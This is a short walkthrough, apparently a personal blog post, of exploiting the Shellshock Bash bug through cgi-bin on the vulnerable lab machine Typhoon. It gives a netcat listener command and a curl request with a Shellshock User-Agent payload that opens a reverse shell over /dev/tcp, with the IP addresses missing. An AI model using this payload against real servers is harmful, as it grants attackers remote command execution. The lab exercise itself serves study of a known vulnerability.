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  • hamidullahbayram

manually cgi-bin / shellshock Exploitation w/o Metapsloit

As it's known, cgi-bin is a directory that contains .cgi (Common Gateway Interface) command scripts, provide functionality with a web browser under certain conditions.

Regarding Shellshock, it is a bug in Bash (1.0.3 - 4.3) so that an attacker can gain access with arbitrary commands. This vulnerability can be easily exploited by an attacker.

The test command has been executed on vuln machiene Typhoon:,267

> Shellshock vulnerability hassbeen detected via Nikto search.

> start the listener port first with netcat on local for Reverse Shell:

nc -lvp 4433

> Send a request via curl:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ 0>&1'

first is attacker IP, the second one is victim's IP addresses.

It's seen that the environment of http-user-agent stores the user agent header, that functions for execution to exploit Shellshock:

Now, the usage of Shellshock opens a reverse shell on local sending request to the target to gain control over connection on bash.

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